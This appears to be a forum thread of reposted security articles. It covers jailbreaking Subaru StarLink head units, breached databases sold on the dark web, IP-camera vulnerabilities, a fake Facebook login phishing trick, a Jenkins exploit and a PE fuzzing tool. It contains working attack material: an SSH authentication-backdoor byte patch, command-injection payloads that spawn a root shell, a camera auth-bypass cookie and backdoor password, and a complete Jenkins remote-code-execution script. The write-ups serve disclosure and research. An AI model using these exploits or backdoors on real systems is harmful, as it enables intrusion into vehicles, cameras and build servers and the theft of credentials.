offset of 0x00002000 into the cluster pointed to by table entry 0x0280. At offset 0x00003000, write 0x0c078000 bytes from an offset of 0x00002200 into the cluster pointed to by table entry 0x0280. At offset 0x3fffb000, write 0x00000200 bytes from an offset of 0x07a20000 into the cluster pointed to by table entry 0x0e80. As the 0x0c078000 byte write runs off the end of first cluster, the correct behavior is to jump to the next cluster in the table and continue reading. This simplifies the extents section. Final Decompression With this, we know enough to completely decompress the encrypted and compressed QNXCNDFS files and successfully mount them through the Linux QNX6 driver. This was all done via static analysis. See qdecant for a rough implementation of this, but do note that you'll have to compile your own python lzo module with one function call change for this to work. This was a quick, and woefully inefficient, script to get the files dumped as soon as possible. I would have improved it further, but you'll see why I didn't subsequently. system.dat Here's a small sample of the files and directories inside of system.dat: ./bin ... ./bin/bt_test ./bin/iocupdate ./bin/awk ./bin/display_image ./bin/gles1-gears ./bin/screenshot ... ./lib ./lib/libQt53DLogic.so.5 ... ./lib/libQt53DQuick.so.5 ./etc ./etc/resolv.conf ./etc/licenseAgreement.txt ./etc/openSourceLicenses.txt ./etc/options.connmgr ./app/usr/share/prompts/waveFiles/4CH ... ./app/usr/share/trace/UISpeechService.hbtc ./app/etc/wicome/DbVersion.txt ... ./app/etc/wicome/SCP.rnf ./app/etc/speech/AudioConfig.txt ./app/share/updatestrings.json ./app/wicome ./usr ./usr/var ./usr/var/DialogManager ./usr/var/DialogManager/DynamicUserDataGrammar ./usr/var/UISS ./usr/var/UISS/speechTEFiles/sat ./dialogManager/dialog/grammar/en_US/grammarHouseBackward.fcf ... ./ifs_images ./ifs_images/sys1.ifs ./ifs_images/core1.ifs ./ifs_images/hmi1.ifs ./ifs_images/second1.ifs ./ifs_images/third1.ifs Far less than I imagined. Plenty of duplicated files we already had access to from the ISO file. The interesting find are the new ifs files at the bottom. ifs_images There are plenty of more files in the system.dat ifs images. It is always fun to look around system internals. Here are a few interesting findings: tr.cpp - Some sort of build artifact. Has something to do with mapping fonts or translation strings to the UI I believe. Hints at a dealer, factory, and engineering mode. I believe dealer and factory can be triggered with known button combinations. I am unsure how to get into engineering mode or what it even contains. "FACTORY_MODE"<<"DEALER_MODE"<<"ENGINEERING_MODE"; CarplayService.cfg - Apple apparently recommends that head units supporting Carplay not inject their own UI/functionality on top of or next to Carplay. Well done Apple and Subaru, that's always annoying. "Screen_Width": 800, /* March-02-2016: The Apple Spec recommended is slightly changed here as per discussion with Apple [during demo over webex] and they suggested the carplay screen to occupy full screen of HU removing the status bar [maserati icon]*/ Internal document — Found an older Microsoft Office document with what looks like company internal details (serial numbers) on various components. Mentions a number of cars in the Subaru lineup then a codename for some sort of new Subaru North American vehicle. This is from 2016, so I'd guess that vehicle has already been announced by now. On the bright side, it didn't look very sensitive. Overall, there was lots of stuff, but no obvious code execution mechanisms found in the brief search. I was hoping for a script that loaded code from the USB drives, some form of debugging mode with peek/poke, or anything useful. There are enough files here where I could probably keep exploring and find an avenue, but let's revisit the serial port for now. Back to QNXCNDFS Most of the QNXCNDFS structure is understood. Nowhere during the reverse engineering process did I find any signatures, signature verification code, or strings indicating some form of signature check taking place. However, being able to prove that there isn't a signature check is difficult through reverse engineering alone. The easiest way to prove this would be to generate our own custom QNXCNDFS image, overwrite one in the update file, and try to flash it down. It it works, great; if not, we'll probably get a new error message that will point us to another signature check we missed. As we understand the file structure, we could work backwards and create a tool to compress a QNX6 filesystem image into a QNXCNDFS file. But we also know that the cndfs application looks to support creating QNXCNDFS files, so if we already had code-execution, we could just use that tool to create our images and skip the time-consuming step of trying to generate valid QNXCNDFS files from scratch. Both are viable options, but let's look for more flaws first. The Shadow File Here's the shadow file with the hashes replaced. root:@S@aaaaa@56c26c380d39ce15:1042473811:0:0 logger:@S@bbbbb@607cb4704d35c71b:1420070987:0:0 certifier:@S@ccccc@e0a3f6794d650876:1420137227:0:0 Three passwords I failed to crack. Here's passwd: root:x:0:0:Superuser:/:/bin/sh daemon::1:2:daemon:/: dm::2:8:dwnmgr:/: Important notes about passwd here, from the QNX manual: If the has_passwd field contains an x character, a password has been defined for this user. If no character is present, no password has been defined. and The initial_command field contains the initial command to run after the user has successfully logged in. This command and any arguments it takes must be separated by tab or space characters. As the command is spawned directly (not run by a shell), no shell expansions is performed. There is no mechanism for specifying command-line arguments that contain space or tab characters themselves. (Quoting isn't supported.) If no initial_command is specified, /bin/sh is used. So, we can potentially login over serial to daemon and dm. They have no password defined, and no initial command specified, which implies /bin/sh will be the command. Does this work? Non-privileged Code Execution Absolutely. $ ls sh: ls: cannot execute - No such file or directory $ echo $PATH :/proc/boot:/bin:/usr/sbin:/fs/core1/core1/bin:/fs/sys1/sys1/bin:/fs/core/hmi:/fs/second1/second1/bin:/fs/third1/third1/bin:/sbin:/fs/system/bin $ cd /fs/system/bin $ echo * HBFileUpload NmeCmdLine antiReadDisturbService awk bt_test cat cdqnx6fs changeIOC chkdosfs chkfsys chkqnx6fs chmod cp cypress_ctrl date dbus-send dbustracemonitor dd devb-umass devc-serusb display_image emmcvuc fdisk fs-cifs fsysinfo gles1-gears grep hd hmiHardControlReceiver hogs inetd inject iocupdate isodigest ls mediaOneTestCLI mkdir mkdosfs mkqnx6fs mtouch_inject mv netstat pcm_logger pfctl pidin ping pppd qdbc rm screenshot showmem slog2info softwareUpdate sshd sync telematicsService telnetd testTimeshift top tracelogger ulink_ctrl use watchdog-server which $ ./cdqnx6fs sh: ./cdqnx6fs: cannot execute - Permission denied Unfortunately, nearly ever binary is locked down to the root user. We can only navigate around via cd and dump directory contents with echo *. The good news is that when the system mounts a FAT32 USB drive, it marks every binary as 777. Thus, glob every binary we've extracted thus far into a folder on a flash drive, insert it into the head unit USB adapter, connect to dm or daemon via serial, set your $PATH to include the aforementioned folder, and then type ls. $ ls -las / total 201952 1 lrwxrwxrwx 1 root root 28 Jan 01 00:02 HBpersistence -> /fs/data/app/usr/share/trace 1 drwxr-xr-x 2 root root 30 May 25 2017 bin 1 drwxr-xr-x 2 root root 10 May 25 2017 dev 1 drwxr-xr-x 2 root root 20 May 25 2017 etc 0 dr-xr-xr-x 2 root root 0 Jan 01 00:02 fs 1 dr-xr-x--- 2 root 73 10 Dec 31 1969 home 0 drwxrwxr-x 8 root root 0 Jan 01 00:01 pps 201944 dr-xr-xr-x 2 root root 103395328 Jan 01 00:02 proc 1 dr-xr-x--- 2 root upd 10 Dec 31 1969 sbin 0 dr-xr-xr-x 2 root root 0 Jan 01 00:02 srv 1 lrwxrwxrwx 1 root root 10 May 25 2017 tmp -> /dev/shmem 1 drwxr-xr-x 2 root root 10 May 25 2017 usr Local code execution via serial. We can now execute every binary that doesn't require any sort of enhanced privileges. cdqnx6fs is one of them. $ ./cdqnx6fs ---help cdqnx6fs - condense / restore Power-Safe (QNX6) file-systems cdqnx6fs -c [(general-option | condense-option)...] src dst cdqnx6fs -r [(general-option | restore-option)...] src dst I wish I could provide some sage advice on how I solved this but it just comes down to experience. Do it enough and patterns will emerge. Image Creation Assuming cdqnx6fs works, we can now extract the system.dat (using the -r flag), mount the extracted QNX6 image in a system that supports read/write operations, modify the image in some way, flash it back down, and see if it works. If the image truly isn't signed or the verification code is broken, the flashing step will succeed. To modify the QNX6 images, we can't use the Linux driver as that only supports reading. We'll have to use an official QNX 6 test VM for full QNX6 filesystem IO. Extract the image, mount the image, add a test file in a known directory, unmount the image, transfer it back to the Harman head unit, repackage it using the correct encryption key, replace the file into the update package, flash it down, pray. The install succeeds and we can find the new file via serial. The system effectively runs unsigned code and the only "protection" against this is what looks to be an easily reverse engineered cipher. Root Escalation We can now modify system files, but the next question is, what files should we modify for root code execution? Keep in mind that the shadow file and various SSH keys are in the IFS binary blobs. So, while the best root method may be replacing the root password, that would involve more reverse engineering. We don't know the IFS file structure, and at this point, diving into yet another binary blob black box format doesn't sound enjoyable. (Someone else do it.) There are a large number of files not in the IFS images, but none of them are shell scripts or any sort of obvious startup script we can modify. Our options are mostly all system binaries. There are an infinite number of ways to gain (network) code execution by replacing binaries, but I'll stick with what I thought of first. Let's backdoor SSH to always log us in even if the password is incorrect. Backdooring SSH You'd think this part would just be a web search away. Unfortunately, searching for "backdooring ssh" leads to some pretty useless parts of the Internet. Pull the source for the version of OpenSSH running on the system — it's 5.9 (check strings and you'll see OpenSSH_5.9 QNX_Secure_Shell-20120127). Browse around, try to understand the authentication process, and target a location for a patch. There were a few locations that looked good, but I started here in auth2-passwd.c: Here's userauth_passwd: static int userauth_passwd(Authctxt *authctxt) { char *password, *newpass; int authenticated = 0; int change; u_int len, newlen; change = packet_get_char(); password = packet_get_string(&len); if (change) { /* discard new password from packet */ newpass = packet_get_string(&newlen); memset(newpass, 0, newlen); xfree(newpass); } packet_check_eom(); if (change) logit("password change not supported"); else if (PRIVSEP(auth_password(authctxt, password)) == 1) authenticated = 1; memset(password, 0, len); xfree(password); return authenticated; } The patch should be straight forward. Instead of returning authenticated = 0 on failure, always return authenticated = 1. Find this location in the binary by matching strings: .text:080527E6 .text:080527E6 loc_80527E6 ; CODE XREF: sub_805279C+38↑j .text:080527E6 CBZ R6, loc_80527F2 .text:080527E8 LDR R0, =aPasswordChange_0 ; "password change not supported" .text:080527EA MOVS R5, #0 .text:080527EC BL sub_806CC94 .text:080527F0 B loc_805280E .text:080527F2 ; --------------------------------------------------------------------------- .text:080527F2 .text:080527F2 loc_80527F2 ; CODE XREF: sub_805279C:loc_80527E6↑j .text:080527F2 LDR R3, =dword_808A758 .text:080527F4 MOV R0, R5 .text:080527F6 MOV R1, R4 .text:080527F8 LDR R3, [R3] .text:080527FA CBZ R3, loc_8052802 .text:080527FC BL sub_8056A18 .text:08052800 B loc_8052806 .text:08052802 ; --------------------------------------------------------------------------- .text:08052802 .text:08052802 loc_8052802 ; CODE XREF: sub_805279C+5E↑j .text:08052802 BL sub_8050778 .text:08052806 .text:08052806 loc_8052806 ; CODE XREF: sub_805279C+64↑j .text:08052806 SUBS R3, R0, #1 .text:08052808 NEGS R0, R3 .text:0805280A ADCS R0, R3 .text:0805280C MOV R5, R0 .text:0805280E .text:0805280E loc_805280E ; CODE XREF: sub_805279C+54↑j .text:0805280E MOVS R1, #0 ; c .text:08052810 LDR R2, [SP,#0x28+var_24] ; n .text:08052812 MOV R0, R4 ; s .text:08052814 BLX memset .text:08052818 MOV R0, R4 .text:0805281A BL sub_8072DB0 .text:0805281E LDR R3, =__stack_chk_guard .text:08052820 LDR R2, [SP,#0x28+var_1C] .text:08052822 MOV R0, R5 .text:08052824 LDR R3, [R3] .text:08052826 CMP R2, R3 .text:08052828 BEQ loc_805282E .text:0805282A BLX __stack_chk_fail .text:0805282E ; --------------------------------------------------------------------------- .text:0805282E .text:0805282E loc_805282E ; CODE XREF: sub_805279C+8C↑j .text:0805282E ADD SP, SP, #0x14 .text:08052830 POP {R4-R7,PC} R0 is our return value in ARM, and will contain the value of authenticated on subroutine exit. The write to R0 is: .text:08052822 28 46 MOV R0, R5 Change this to return authenticated = 1;, which is going to be this in ASM: .text:08052822 01 20 MOVS R0, #1 Thus, 28 46 -> 01 20. Not the best backdoor possible, but it works. $ ssh root@192.168.0.1 ****************************** SUBARU ******************************* Warning - You are knowingly accessing a secured system. That means you are liable for any mischeif you do. ********************************************************************* root@192.168.0.1's password: # uname -a QNX localhost 6.6.0 2016/09/07-09:25:33CDT i.MX6S_Subaru_Gen3_ED2_Board armle # cat /etc/shadow root:@S@aaaaaa@56c26c380d39ce15:1042473811:0:0 logger:@S@bbbbbb@607cb4704d35c71b:1420070987:0:0 certifier:@S@cccccc@e0a3f6794d650876:1420137227:0:0 # pidin -F "%n %U %V %W %X %Y %Z" | grep sh usr/sbin/sshd 0 0 0 0 0 0 usr/sbin/sshd 0 0 0 0 0 0 bin/sh 0 0 0 0 0 0 Putting it All Together To root any 2017+ Subaru StarLink head unit, an attacker needs the following to generate valid update images: A Subaru head unit with serial and USB port access. The encryption keys for the update files. An official update. These seem to be available for most platforms in many different ways. Without the official update, the ISO signature check will fail and the install will not continue to the stage where the QNXCNDFS files are written. Physical access to the vehicles USB ports. Technically, the head unit isn't needed, but to replace it you'd need code to generate QNXCNDFS images from QNX6 filesystem images. After we have those pieces: Use the serial and USB ports to gain local code execution on the system. Decondense an official software update QNXCNDFS image. Use the QNX Platform VM Image to modify the QNX6 filesystem. Inject some form of backdoor — sshd in this case. Re-package the update file via cndfs. Replace the modified QNXCNDFS file in the official system update. Install. While this may seem like an execessive number of steps to gain code execution, keep in mind an attacker would only need to do this once and then could conceivably generate valid updates for other platforms. Valid update images were initially challenging to find, but it appears that Subaru is now releasing these via a map-update application that can be used if you have a valid VIN. I will not be releasing modified update files and I wouldn't recommend doing this to your own car. CVE-2018-18203 A vulnerability in the update mechanism of Subaru StarLink head units 2017, 2018, and 2019 may give an attacker (with physical access to the vehicle's USB ports) the ability to rewrite the firmware of the head unit. This vulnerability is due to bugs in the signature checking implementation used when verifying specific update files. An attacker could potentially install persistent malicious head unit firmware and execute arbitrary code as the root user. Next Steps After all of this, I still know very little about the Harman head unit system, but I do know how to root them. Reverse engineering QNXCNDFS wasn't required, but was an interesting avenue to explore and may help other researchers in the future. The next step is far less tedious than reversing filesystem containers — explore the system, see what hidden functionality exists (Andromeda is probably a goldmine, map out dbus), setup a cross-compiler, and so on. Notes from Subaru and Harman Both Subaru and Harman wanted to relay messages about the flaw in this write-up. I have paraphrased them below. If you have questions, please contact either Subaru or Harman directly. Note from Subaru Subaru will have updates for head units affected by this flaw in the coming weeks. Note from Harman The firmware update process attempted to verify the authenticity of the QNXCNDFS dat files. The procedure in question had a bug in it that caused unsigned images to verify as "valid", which allowed for unsigned code installation. Conclusion I started this in my free time in July of 2018 and finished early the next month. Overall, the process took less than 100 hours. The embargo was originally scheduled for 90 days, which would have been November 5th, 2018. Subaru requested more time before the original embargo ended and I agreed to extend it until the end of November. I was unable to find any sort of responsible/coordinated disclosure form on Harman or Subaru's websites. That was disappointing as Harman seems to have plenty of sales pages detailing their security programs and systems. I did managed to find a Harman security engineer on LinkedIn who did an excellent job handling the incident. Thank you! Harman and Subaru should not assume that the biggest flaw is releasing update files. Letting customers update their own head units is wonderful, and it lets security researchers find flaws and report them. Giving the updates exclusively to dealers prevents the good guys from finding bugs. Nation states and organized crime would certainly not have trouble gaining access to firmware and software updates. If anyone affiliated with education or some other useful endeavor would like the head unit, I'll be happy to ship it assuming you pay the shipping costs and agree to never install this in a vehicle. Thank you to those I worked with at Harman, especially Josiah Bruner, and to Subaru for making a great car. Questions, comments, complaints? github.scott@gmail.com Sursa: https://github.com/sgayou/subaru-starlink-research/blob/master/doc/README.md#jailbreaking-subaru-starlink
-
- 2
-
-
-
Hacker Breaches Dozens of Sites, Puts 127 Million New Records Up for Sale February 15, 2019Swati Khandelwal A hacker who was selling details of nearly 620 million online accounts stolen from 16 popular websites has now put up a second batch of 127 million records originating from 8 other sites for sale on the dark web. Last week, The Hacker News received an email from a Pakistani hacker who claims to have hacked dozens of popular websites (listed below) and selling their stolen databases online. During an interview with The Hacker News, the hacker also claimed that many targeted companies have probably no idea that they have been compromised and that their customers' data have already been sold to multiple cyber criminal groups and individuals. Package 1: Databases From 16 Compromised Websites On Sale In the first round, the hacker who goes by online alias "gnosticplayers" was selling details of 617 million accounts belonging to the following 16 compromised websites for less than $20,000 in Bitcoin on dark web marketplace Dream Market: Dubsmash — 162 million accounts MyFitnessPal — 151 million accounts MyHeritage — 92 million accounts ShareThis — 41 million accounts HauteLook — 28 million accounts Animoto — 25 million accounts EyeEm — 22 million accounts 8fit — 20 million accounts Whitepages — 18 million accounts Fotolog — 16 million accounts 500px — 15 million accounts Armor Games — 11 million accounts BookMate — 8 million accounts CoffeeMeetsBagel — 6 million accounts Artsy — 1 million accounts DataCamp — 700,000 accounts Out of these, the popular photo-sharing service 500px has confirmed that the company suffered a data breach in July last year and that personal data, including full names, usernames, email addresses, password hashes, location, birth date, and gender, for all the roughly 14.8 million users existed at the time was exposed online. Just yesterday, Artsy, DataCamp and CoffeeMeetsBagel have also confirmed that the companies were victims of a breach last year and that personal and account details of their customers was stolen by an unauthorized attacker. Diet tracking service MyFitnessPal, online genealogy platform MyHeritage and cloud-based video maker service Animoto had confirmed the data breaches last year. In response to the news, video-sharing app Dubsmash also issued a notice informing its users that they have launched an investigation and contacted law enforcement to look into the matter. Package 2: Hacked Databases From 8 More Websites On Sale While putting the second round of the stolen accounts up for sale on the Dream Market—one of the largest dark web marketplaces for illegal narcotics and drug paraphernalia—the hacker removed the collection of the first round to avoid them from getting leaked and land on security initiatives like Google's new Password Checkup tool. Gnosticplayers told The Hacker News in an email that the second round listed stolen data from 127 million accounts that belonged to the following 8 hacked websites, which was up for sale for $14,500 in bitcoin: Houzz — 57 million accounts YouNow — 40 million accounts Ixigo — 18 million accounts Stronghold Kingdoms — 5 million accounts Roll20.net — 4 million accounts Ge.tt — 1.83 million accounts Petflow and Vbulletin forum — 1.5 million accounts Coinmama (Cryptocurrency Exchange) — 420,000 accounts Of the above-listed websites, only Houzz has confirmed the security breach earlier this month that compromised its customers' public information and certain internal account information. Like the first round, the recent collection of 127 million stolen accounts has also been removed from the sale on the dark web. Though some of the services are resetting users' passwords after confirming its data was stolen, if you are a user of any of the above-listed services, you should consider changing your passwords in the event you re-used the same password across different websites. Have something to say about this article? Comment below or share it with us on Facebook, Twitter or our LinkedIn Group. Sursa: https://thehackernews.com/2019/02/data-breach-website.html?m=1
-
Maurits van Altvorst Achieving remote code execution on a Chinese IP camera February 14, 2019 Background Cheap Chinese Internet of Things devices are on the rise. Unfortunately, security on these devices is often an afterthought. I recently got my hands on an “Alecto DVC-155IP” IP camera. It has Wi-Fi, night vision, two-axis tilt and yaw control, motion sensing and more. My expectations regarding security were low, but this camera was still able to surprise me. Setting up the camera Setting up the camera using the app was a breeze. I had to enter my Wi-Fi details, a name for the camera and a password. Nothing too interesting so far. Using Nmap on the camera gave me the following results: ➜ ~ nmap -A 192.168.178.59 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-09 12:59 CET Nmap scan report for 192.168.178.59 Host is up (0.010s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 23/tcp open telnet BusyBox telnetd 80/tcp open http thttpd 2.25b 29dec2003 |_http-server-header: thttpd/2.25b 29dec2003 |_http-title: Site doesn't have a title (text/html; charset=utf-8). 554/tcp open rtsp HiLinux IP camera rtspd V100R003 (VodServer 1.0.0) |_rtsp-methods: OPTIONS, DESCRIBE, SETUP, TEARDOWN, PLAY Service Info: Host: RT-IPC; Device: webcam Three open ports: 23, 80 and 554. Surprisingly, port 23 doesn’t get mentioned anywhere in the manual. Is this some debug port from the manufacturer, or a backdoor from the Chinese government? After manually testing a few passwords via telnet I moved on. When I connected to the admin panel - accessible on port 80 - I was greeted with a standard login screen that prompts the user for a username and password. The first step I took was opening the Chrome developer tab. This allows you to inspect the network requests that Chrome made while visiting a website. I saw that there were a lot of requests being made for a simple login page. My eye quickly fell on a specific request: /cgi-bin/hi3510/snap.cgi?&-getstream&-chn=2 Hmm, “getstream”, I wonder what happens if I open this in another tab… Within 2 minutes I’ve gained unauthenticated access to the live view of the camera. I knew that cheap Chinese cameras weren’t secure, but I didn’t expect it was this bad. Other observations While looking through the network requests, I noticed some more notable endpoints: You are able to get the Wi-Fi SSID, BSSID, and password from the network the camera is connected to by visiting /cgi-bin/getwifiattr.cgi. This allows you to retrieve the location of the camera via a service such as wigle.net. You are able to set the camera’s internal time via /cgi-bin/hi3510/setservertime.cgi?-time=YYYY.MM.DD.HH.MM.SS&-utc. I’m not sure if this opens up any attack vectors, but it’s interesting nonetheless. It might be possible to do some interesting things by sending invalid times or big strings, but I don’t want to risk bricking my camera testing this. You are able to get the camera’s password via /cgi-bin/p2p.cgi?cmd=p2p.cgi&-action=get. Of course, you don’t even need the password to log in. Just set the “AuthLevel” cookie to 255 and you instantly get admin access. You are able to get the serial number, hardware revision, uptime, and storage info via /web/cgi-bin/hi3510/param.cgi?cmd=getserverinfo All of these requests are unauthenticated. Remote code execution Let’s take another look at the requests made on the login page. You can see a lot of “.cgi” requests. CGI-files are “Common Gateway Interface” files. They are executable scripts used in web servers to dynamically create web pages. Because they’re often based on bash scripts, I started focusing on these requests first because I thought I might find an endpoint susceptible to bash code injection. To find out if a .cgi endpoint was vulnerable, I tried substituting some request parameters with $(sleep 3). When I tried /cgi-bin/p2p.cgi?cmd=p2p.cgi&-action=$(sleep 3), it took a suspiciously long time before I got back my response. To confirm that I can execute bash code, I opened Wireshark on my laptop and sent the following payload to the camera: $(ping -c2 192.168.178.243) And sure enough, I saw two ICMP requests appear on my laptop. But surely, nobody in their right mind would connect such a cheap, insecure IP camera directly to the internet, right? That’s 710 Alecto DVC-155IP cameras connected to the internet that disclose their Wi-Fi details (which means that I can figure out its location by using a service such as wigle.net), allow anyone to view their live stream and are vulnerable to RCE. And this is just their DVC-155IP model, Alecto manufactures many different IP cameras each running the same software. Returning to port 23 Now that I’m able to run commands, it’s time to return to the mysterious port 23. Unfortunately, I’m not able to get any output from the commands I execute. Using netcat to send the output of the commands I executed also didn’t work for some reason. After spending way too much time without progress, this was the command that did the trick: telnetd -l/bin/sh -p9999 This starts a telnet server on port 9999. And sure enough, after connecting to it I was greeted with an unauthenticated root shell. Reading /etc/passwd gave me the following output: root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh I didn’t even have to start Hashcat for this one: a quick Google search of the hash was all I needed to find that the password of the mysterious backdoor port was cat1029. Yes, the password to probably thousands of IP cameras on the internet is cat1029. And the worst part is that there’s no possible way to change this password anywhere in the typical user interface. Contacting the manufacturer When I contacted Alecto with my findings, they told me they weren’t able to solve these problems because they didn’t create the software for their devices. After a quick Shodan search I found that there were also internet connected cameras from other brands, such as Foscam and DIGITUS, that had these vulnerabilities. Their user interfaces look different, but they were susceptible to the same exact vulnerabilities via the same exact endpoints. It seems that these IP cameras are manufactured by a Chinese company in bulk (OEM). Other companies like Alecto, Foscam, and DIGITUS, resell them with slightly modified firmware and custom branding. A vulnerability in the Chinese manufacturer’s software means that all of its children companies are vulnerable too. Unfortunately, I don’t think that the Chinese OEM manufacturer will do much about these vulnerabilities. I guess that the phrase “The S in IoT stands for security” is true after all. Author | Maurits van Altvorst I'm 16 years old and a student from Gemeentelijk Gymnasium Hilversum. You can find my Github here and my Linkedin here Sursa: https://www.mauritsvanaltvorst.com/rce-chinese-ip-cameras/
-
- 1
-
-
WARNING – New Phishing Attack That Even Most Vigilant Users Could Fall For February 15, 2019Mohit Kumar How do you check if a website asking for your credentials is fake or legit to log in? By checking if the URL is correct? By checking if the website address is not a homograph? By checking if the site is using HTTPS? Or using software or browser extensions that detect phishing domains? Well, if you, like most Internet users, are also relying on above basic security practices to spot if that "Facebook.com" or "Google.com" you have been served with is fake or not, you may still fall victim to a newly discovered creative phishing attack and end up in giving away your passwords to hackers. Antoine Vincent Jebara, co-founder and CEO of password managing software Myki, told The Hacker News that his team recently spotted a new phishing attack campaign "that even the most vigilant users could fall for." Vincent found that cybercriminals are distributing links to blogs and services that prompt visitors to first "login using Facebook account" to read an exclusive article or purchase a discounted product. That’s fine. Login with Facebook or any other social media service is a safe method and is being used by a large number of websites to make it easier for visitors to sign up for a third-party service quickly. Generally, when you click "log in with Facebook" button available on any website, you either get redirected to facebook.com or are served with facebook.com in a new pop-up browser window, asking you to enter your Facebook credentials to authenticate using OAuth and permitting the service to access your profile’s necessary information. However, Vincent discovered that the malicious blogs and online services are serving users with a very realistic-looking fake Facebook login prompt after they click the login button which has been designed to capture users’ entered credentials, just like any phishing site. As shown in the video demonstration Vincent shared with The Hacker News, the fake pop-up login prompt, actually created with HTML and JavaScript, are perfectly reproduced to look and feel exactly like a legitimate browser window—a status bar, navigation bar, shadows and URL to the Facebook website with green lock pad indicating a valid HTTPS. Moreover, users can also interact with the fake browser window, drag it here-and-there or exit it in the same way any legitimate window acts. The only way to protect yourself from this type of phishing attack, according to Vincent, "is to actually try to drag the prompt away from the window it is currently displayed in. If dragging it out fails (part of the popup disappears beyond the edge of the window), it's a definite sign that the popup is fake." Besides this, it is always recommended to enable two-factor authentication with every possible service, preventing hackers from accessing your online accounts if they somehow manage to get your credentials. Phishing schemes are still one of the most severe threats to users as well as companies, and hackers continue to try new and creative ways to trick you into providing them with your sensitive and financial details that they could later use to steal your money or hack into your online accounts. Stay tuned, stay safe! Have something to say about this article? Comment below or share it with us on Facebook, Twitter or our LinkedIn Group. Sursa: https://thehackernews.com/2019/02/advance-phishing-login-page.html?m=1
-
- 2
-
-
#!/usr/bin/python # Author: Adam Jordan # Date: 2019-02-15 # Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc # PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative) import argparse import jenkins import time from xml.etree import ElementTree payload = ''' import org.buildobjects.process.ProcBuilder @Grab('org.buildobjects:jproc:2.2.3') class Dummy{ } print new ProcBuilder("/bin/bash").withArgs("-c","%s").run().getOutputString() ''' def run_command(url, cmd, job_name, username, password): print '[+] connecting to jenkins...' server = jenkins.Jenkins(url, username, password) print '[+] crafting payload...' ori_job_config = server.get_job_config(job_name) et = ElementTree.fromstring(ori_job_config) et.find('definition/script').text = payload % cmd job_config = ElementTree.tostring(et, encoding='utf8', method='xml') print '[+] modifying job with payload...' server.reconfig_job(job_name, job_config) time.sleep(3) print '[+] putting job build to queue...' queue_number = server.build_job(job_name) time.sleep(3) print '[+] waiting for job to build...' queue_item_info = {} while 'executable' not in queue_item_info: queue_item_info = server.get_queue_item(queue_number) time.sleep(1) print '[+] restoring job...' server.reconfig_job(job_name, ori_job_config) print '[+] fetching output...' last_build_number = server.get_job_info(job_name)['lastBuild']['number'] console_output = server.get_build_console_output(job_name, last_build_number) print '[+] OUTPUT:' print console_output if __name__ == '__main__': parser = argparse.ArgumentParser(description='Jenkins RCE') parser.add_argument('--url', help='target jenkins url') parser.add_argument('--cmd', help='system command to be run') parser.add_argument('--job', help='job name') parser.add_argument('--username', help='username') parser.add_argument('--password', help='password') args = parser.parse_args() run_command(args.url, args.cmd, args.job, args.username, args.password) Sursa: https://gist.github.com/adamyordan/96da0ad5e72cbc97285f2df340cac43b
-
- 1
-
-
pe-afl combines static binary instrumentation on PE binary and WinAFL so that it can fuzz on windows user-mode application and kernel-mode driver without source or full symbols or hardware support details, benchmark and some kernel-mode case study can be found on slide, which is presented on BluehatIL 2019 it is not so reliable and dirty, but it works and high-performance i reported bugs on office,gdiplus,jet,clfs,cng,hid,... by using this tool the instrumentation part on PE can be reused on many purpose How-to instrument instrument 2 NOP on entry point of calc.exe ida.exe demo\calc.exe # loading with pdb is more reliable if pdb is available File->script file->ida_dump.py python instrument.py -i"{0x1012d6c:'9090'}" demo\calc.exe demo\calc.exe.dump.txt # 0x1012d6c is entry point address, you can instrument from command-line or from __main__ in instrument.py instrument each basic block for fuzzing ida.exe demo\msjet40.dll File->script file->ida_dump.py python pe-afl.py -m demo\msjet40.dll demo\msjet40.dll.dump.txt # msjet40 is multi-thread, so -m is here # see fuzz JetDB on win7 ps. instrument script run faster on non-windows How-to fuzz you have to implement the wrapper/harness (AFL\test_XXX) depends on target and add anything you want, such page heap, etc fuzz JetDB on win7 copy /Y msjet40.instrumented.dll C:\Windows\System32\msjet40.dll bin\afl-showmap.exe -o NUL -p msjet40.dll -- bin\test_mdb.exe demo\mdb\normal.mdb # make sure that capture is OK bin\AFL.exe -i demo\mdb -o out -t 5000 -m none -p msjet40.dll -- bin\test_mdb.exe @@ fuzz CLFS on win10 install_helper.bat disable_dse.bat copy /Y clfs.instrumented.sys C:\Windows\System32\drivers\clfs.sys # reboot if necessary bin\afl-showmap.exe -o NUL -p clfs.sys -- bin\test_clfs.exe demo\blf\normal.blf # make sure that capture is OK bin\AFL.exe -i demo\blf -o out -t 5000 -m none -p clfs.sys -- bin\test_clfs.exe @@ How-to trace import driver execution trace into lighthouse ida.exe demo\clfs.sys File->script file->ida_dump.py python pe-afl.py -cb demo\clfs.sys demo\clfs.sys.dump.txt copy /Y clfs.instrumented.sys C:\Windows\System32\drivers\clfs.sys # reboot if necessary bin\afl-showmap.exe -o NUL -p clfs.sys -d -- bin\test_clfs.exe demo\blf\normal.blf # output is trace.txt python lighthouse_trace.py demo\clfs.sys demo\clfs.sys.mapping.txt trace.txt > trace2.txt # install lighthouse xcopy /y /e lighthouse [IDA folder]\plugins\ ida.exe demo\clfs.sys File->Load File->Code coverage file->trace2.txt TODO support x64 Sursa: https://github.com/wmliang/pe-afl
-
